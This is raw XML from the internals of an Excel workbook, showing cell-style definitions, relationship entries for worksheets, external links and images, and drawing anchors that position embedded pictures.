      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="13" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="9" fontId="11" fillId="0" borderId="0" xfId="3" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="178" fontId="11" fillId="0" borderId="0" xfId="3" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="1" fontId="11" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="11" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="9" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="9" fontId="11" fillId="0" borderId="0" xfId="3" applyFont="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1"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externalLink" Target="externalLinks/externalLink5.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet3.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink2.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink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11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><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7619</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>1504950</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1415414</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>1095375</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture 4"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8427085" y="1870710"/>
          <a:ext cx="5012055" cy="2516505"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>30480</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1330388</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>1543319</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="6" name="Picture 5"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8450580" y="0"/>
          <a:ext cx="4904105" cy="1908810"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>114300</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>295275</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>12</xdr:col>
      <xdr:colOff>247650</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>2275</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="7" name="Picture 6"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="16299180" y="661035"/>
          <a:ext cx="4453890" cy="2632710"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>22860</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>904875</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1598295</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>891540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="8" name="Picture 7"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId4"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8442960" y="4196715"/>
          <a:ext cx="5179695" cy="3461385"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>495301</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>1009650</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>381001</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>514706</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="9" name="Picture 8"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId5"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="16062960" y="4301490"/>
          <a:ext cx="4206240" cy="2430780"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>11</xdr:col>
      <xdr:colOff>358140</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>1832610</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>20</xdr:col>
      <xdr:colOff>473222</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>748988</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="10" name="Picture 9"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId6"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="20246340" y="5124450"/>
          <a:ext cx="5669915" cy="23907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409575</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>247650</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>1677057</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Picture 1"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6438900" y="775335"/>
          <a:ext cx="5490210" cy="4010660"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>114300</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>2038350</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>152400</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>4019550</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="Picture 2"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6477000" y="4937760"/>
          <a:ext cx="5356860" cy="4019550"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>28576</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>15</xdr:col>
      <xdr:colOff>390525</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>562</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="Picture 3"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="11729085" y="4966335"/>
          <a:ext cx="5280660" cy="3994785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3360421</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>556261</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>3671439</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture 4"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId4"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6080760" y="9022080"/>
          <a:ext cx="3688080" cy="3609975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>518160</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>114299</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>3517111</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="6" name="Picture 5"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId5"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="9730740" y="9029700"/>
          <a:ext cx="4533265" cy="34480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209550</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>66674</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6181725</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>2315</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
